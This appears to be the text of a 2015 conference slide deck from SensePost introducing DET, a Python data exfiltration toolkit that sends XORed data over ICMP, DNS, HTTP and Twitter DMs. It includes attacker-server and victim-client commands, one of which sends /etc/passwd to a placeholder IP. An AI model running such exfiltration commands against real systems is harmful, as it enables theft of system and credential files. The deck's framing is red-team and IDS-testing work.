DET

 

23th of October 2015

Paul Amar @SensePost

$ whoami

Data Exfiltration Toolkit (DET)

  • Python
  • Multi-threaded
  • Modular (Plugins)
  • Supports ICMP, DNS, HTTP and Twitter DMs

How?

  • One file - det.py (client/server)
     
  • Plugins based (in ./plugins)
  • Listens on specific services (DNS, HTTP, Twitter, ICMP)
  • Each module can have its own logic, Sweet eh?
     
  • Takes a chunk of data, XOR it and sends it.
  • Plugin chosen randomly for each 'message'

ICMP Plugin

How to use it?

Server (Attacker Side)

Client (Victim Side)

(sudo) python det.py -v -L 
(sudo) python det.py -f /etc/passwd -t x.x.x.x -v 

Next steps

  • Wanna contribute? PR your Plugins
  • Release this on GitHub
  • Test it against IDS (with SecData?)

sys.exit(0)

DET

By paul38

DET

  • 2,138